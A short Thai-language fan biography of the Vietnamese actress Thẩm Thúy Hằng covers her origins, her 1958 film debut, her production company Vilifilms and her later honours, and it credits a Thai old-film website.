เถิ่ม ถุย หั่ง ชื่อจริง ชื่อ เหงวียน กิม ฟุ่ง เกิดเมื่อปี 1941 (พ.ศ. 2484) ที่เมือง ห่าย ฟ่อง ( Hải Phòng ) เมืองท่าทางภาคเหนือของเวียดนาม แต่ต่อมาได้ย้ายถิ่นตามครอบครัวมาอยู่ภาคใต้ของเวียดนาม และเติบโตที่ ในจังหวัด อาน ซาง (An Giang ) (อยู่ตอนใต้ของ ไซ่ง่อน หรือนครโฮจิมินห์ ในปัจจุบัน ลงไปอีก) เมื่ออายุ 16 ปี นางสาว กิม ฟุ่ง ได้ไปสมัครเพื่อสอบคัดเลือกเป็นดาราภาพยนตร์ของ บริษัทภาพยนตร์ หมี เวิน โดยที่พ่อแม่ของเธอไม่ทราบ และเธอก็ได้รับการคัดเลือกจากผู้ที่เข้ามาสมัครถึง 2,000 คน เจ้าของบริษัทภาพยนตร์ หมี เวิน ( Mỹ Vân ) ก็ได้ตั้งชื่อเพื่อใช้ในการแสดงให้เธอว่า Thẩm Thúy Hằng เถิ่ม ถุย หั่ง
การแสดงในบทบาทแรกของเธอ คือ บทของ ตาม เนือง ในภาพยนตร์เรื่อง คนงาม แห่ง บิ่ง เซือง
(Người đẹp Bình Dương – เหงื่อย แด็บ บิ่ง เซือง) ในปี 1958 (พ.ศ. 2501) ภาพยนตร์เรื่องนี้ทำให้เธอโด่งดังเป็นที่รู้จัก หลังจากนั้นเธอก็ได้แสดงภาพยนตร์ต่อมาอีกมากมาย ทำให้เธอเป็นดาราของเวียดนามที่แสดงภาพยนตร์มากที่สุดคนหนึ่งในยุค ปลาย 1950 ถึง 1960
ในปี 1969 (พ.ศ. 2512) เธอก็ได้จัดตั้งกลุ่มผลิตภาพยนตร์ของตัวเองด้วย ซึ่งต่อมาได้กลายเป็นบริษัท Vilifilms ซึ่งโด่งดังต่อมาหลังจากนั้น
นอกจากภาพยนตร์แล้ว เธอก็ยังแสดงละครเวที และ ก่าย เลือง (เป็นการแสดงละครดั้งเดิม ของทางภาคใต้เวียดนาม) ด้วย
หลัง ปี 1975 (พ.ศ. 2518) ซึ่ง เวียดนามเหนือและเวียดนามใต้ได้รวมกันแล้ว เธอก็ยังอยู่ในเวียดนาม และยังได้แสดงภาพยนตร์ต่อมาอีกหลายเรื่องด้วย
ในปัจจุบัน เธอได้รับการยกย่องจากรัฐบาลเวียดนาม ให้เป็น ศิลปินดีเด่นของชาติ (Nghệ sĩ ưu tú- เหงะ สี อิว ตู๋) สามีของเธอ คือ เหงวียน เซวียน แหว๋ง ซึ่งเคยเป็นผู้ช่วย นายกรัฐมนตรีด้านการธนาคาร(การคลัง)ของเวียดนามใต้ แต่หลังจากปี 1975 แล้ว เขาก็ได้เป็นที่ปรึกษาทางด้านเศรษฐกิจ ให้แก่ เลขานุการ เหงวียน วัน ลิง และ นายกรัฐมนตรี หวอ วัน เกียด (Võ Văn Kiệt ) ด้วย
จาก: แฟนหนังและเพลงเก่า
ขอบันทึกเก็บไว้ในความทรงจำ
เว็บหนังไทยเก่า : http://www.thaifilm.com/